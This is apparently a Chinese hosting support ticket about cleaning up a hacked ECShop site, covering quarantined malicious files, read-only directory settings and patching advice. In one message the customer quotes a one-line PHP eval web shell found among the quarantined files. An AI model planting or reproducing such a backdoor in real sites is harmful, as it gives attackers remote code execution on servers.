问:请帮忙速速解决,谢谢!
问:目前PC端能打开,但又代码提示,移动端无法正常打开。
问:希望能截图我具体代码在哪里,是那一块有问题,感谢大神
答:您好,核实是因为有此文件被我司杀毒系统识别为异常文件,系统自动把www目录设置为只读状态导致手机站打开异常,已经清理此异常文件,并重新设置www为只读状态,只允许了data和mobile/data可读可写,现在可正常访问了,其次还发现上传了一些其他的异常文件,现在已经把这些文件移动到/yichang/目录下,您可核实后进行删除,非常感谢您长期对我司的支持!
问:这个异常文件是属于什么文件?挂马还是?
问: 您好,详情页仍有异常
问: 目前频道页和详情页顶部依然有异常,之前OK。
答:您好,报错是权限问题已处理请在测试,非常感谢您长期对我司的支持!
问:还有个问题 ,我看到<?php eval($_POST[1337]); ?> 这个php文件放在了yichang里,是否还没有清除呢?
答:您好,查看/www/yichang/ 此目录下多个文件都是异常文件,请您联系程序方检查清理并修复程序漏洞, 您这个程序是ecshop程序建议查看是否有更新或版本升级,非常感谢您长期对我司的支持!
问:好的,感谢,请问能否提供一些防护措施,以免于下次黑客攻击?
答:您好,已经帮您清理并设置了目录保护,当前需要联系程序方检查处理修复程序漏洞,ecshop最近爆出了很多漏洞官网应该是有升级更新补丁的,及时升级更新,非常感谢您长期对我司的支持!
问:您好,请问为何我的zhengjunxi原目录下都是sql文件?是否正常?
答:您好,这个是数据库源文件,是正常的,请您知悉。
非常感谢您长期对我司的支持!
问:能否告知上次清除木马病毒的位置及代码?
答:您好,工单中只提供了部分文件路径,我司结合多种方法去扫描的后门文件,现在无法提供全部清除的文件路径,非常感谢您长期对我司的支持!
问:不应该啊,为什么我的www目录设置了只读状态,依然可以写入?
答:您好,如果是一套干净未被入侵的程序,设置只读是有用的, 如果是被入侵并篡改过的程序,那么后门文件是可以更改任意权限并上传文件的,非常感谢您长期对我司的支持!
问:如果彻底解决的话,该怎么办?
答:您好,彻底解决就是要让程序商升级更新补丁,修复漏洞,然后再对目录做只读设置,以及取消静态目录执行权限来增强安全性,非常感谢您长期对我司的支持!
问:您好,为什么我通过360扫描出来的漏洞
Ecshop pages.lbi.php Xss漏洞
在tmp/compiled/pages.lib.php 文件里修改了代码,如第二行加以下:<?php
if (!defined(\’IN_ECS\’))
{
die(\’Hacking attempt\’);
}并且通过ftp上传覆盖,过一段时间之后,再查看该文件,发现这行代码已经没有了,该php文件恢复到原样。请问这是怎么回事。
答:您好,这个不太清楚,查看该目录下的文件的文件时间最近都有更新,该目录下的文件可能在程序运行中会自动更新.具体请咨询程序官方客服,非常感谢您长期对我司的支持.
问:能否再扫描我的站点,看是否还存在木马,或者提供下ecshop的最新补丁,官网我没找到。
答:您好,目前暂未扫描到后门文件,我司没有ecshop补丁,请联系官方,非常感谢您长期对我司的支持!
问:好的,谢谢大佬!
答:您好,不客气,非常感谢您长期对我司的支持!
